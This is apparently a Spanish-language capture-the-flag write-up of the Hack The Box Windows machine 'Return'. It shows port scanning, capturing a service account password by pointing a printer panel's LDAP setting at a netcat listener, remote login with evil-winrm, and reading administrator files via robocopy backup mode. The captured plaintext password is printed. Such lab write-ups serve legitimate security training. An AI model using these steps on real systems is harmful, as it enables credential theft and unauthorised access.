Return
Return
Windows · Easy - Adventure mode
🔭 Reconocimiento:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
└─$ nmap -p- -sSVC --min-rate 5000 10.129.95.241
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 22:46 +0200
Nmap scan report for 10.129.95.241
Host is up (0.041s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-31 21:05:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-31T21:06:52
|_ start_date: N/A
|_clock-skew: 18m34s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.91 seconds
1
2
3
┌──(pmartinezr㉿kali)-[~]
└─$ crackmapexec smb 10.129.95.241
SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
LLama la atención que el dispositivo parezca una impresora.
Así que nos intentamos conectar y aparece la web de configuración de una impresora.
1
2
3
4
5
└─$ netcat -nvlp 389
listening on [any] 389 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.95.241] 52940
0*`%return\svc-printer�
1edFg43012!!
Cambiamos los settings para que apunte a nuestra IP, dejamos un netcat escuchando en el puerto de ldap predeterminado y recibimos la contraseña 1edFg43012!!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─$ evil-winrm-py -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to '10.129.95.241:5985' as 'svc-printer'
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
evil-winrm-py PS C:\Users\svc-printer\Documents> dir
evil-winrm-py PS C:\Users\svc-printer\Documents> cd ..
evil-winrm-py PS C:\Users\svc-printer>
evil-winrm-py PS C:\Users\svc-printer> dir Desktop
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/31/2026 2:04 PM 34 user.txt
evil-winrm-py PS C:\Users\svc-printer> cd Desktop
evil-winrm-py PS C:\Users\svc-printer\Desktop> type user.txt
a337a7858e99cf5879********
Ahora podemos usar la contraseña para obtener la primera bandera.
👽 Acciones:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
evil-winrm-py PS C:\users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
evil-winrm-py PS C:\users\svc-printer\Documents> robocopy /b c:\Users\Administrator\Desktop c:\users\svc-printer\Documents
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Wednesday, April 1, 2026 3:06:48 AM
Source : c:\Users\Administrator\Desktop\
Dest : c:\users\svc-printer\Documents\
Files : *.*
Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
2 c:\Users\Administrator\Desktop\
*EXTRA Dir -1 c:\users\svc-printer\Documents\My Music\
*EXTRA Dir -1 c:\users\svc-printer\Documents\My Pictures\
*EXTRA Dir -1 c:\users\svc-printer\Documents\My Videos\
*EXTRA File 97280 chimi.exe
*EXTRA File 184973 nc.exe
*EXTRA File 11 query
New File 282 desktop.ini
0%
100%
New File 34 root.txt
0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 3
Files : 2 2 0 0 0 3
Bytes : 316 316 0 0 0 275.6 k
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Wednesday, April 1, 2026 3:06:48 AM
evil-winrm-py PS C:\users\svc-printer\Documents> type root.txt
6aaae37caf067f3f6f********
evil-winrm-py PS C:\users\svc-printer\Documents>
El usuario svc_printer parece pertenecer a un grupo que tiene dos privilegios que llaman la atención
1
2
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
Esto nos permite hacer backups de cualquier fichero/directorio del sistema y lo podemos usar para obtener la bandera root.txt con la utilidad robocopy /B → modo backup ya que este usa SeBackupPrivilege.
Esta entrada está licenciada bajo CC BY 4.0 por el autor.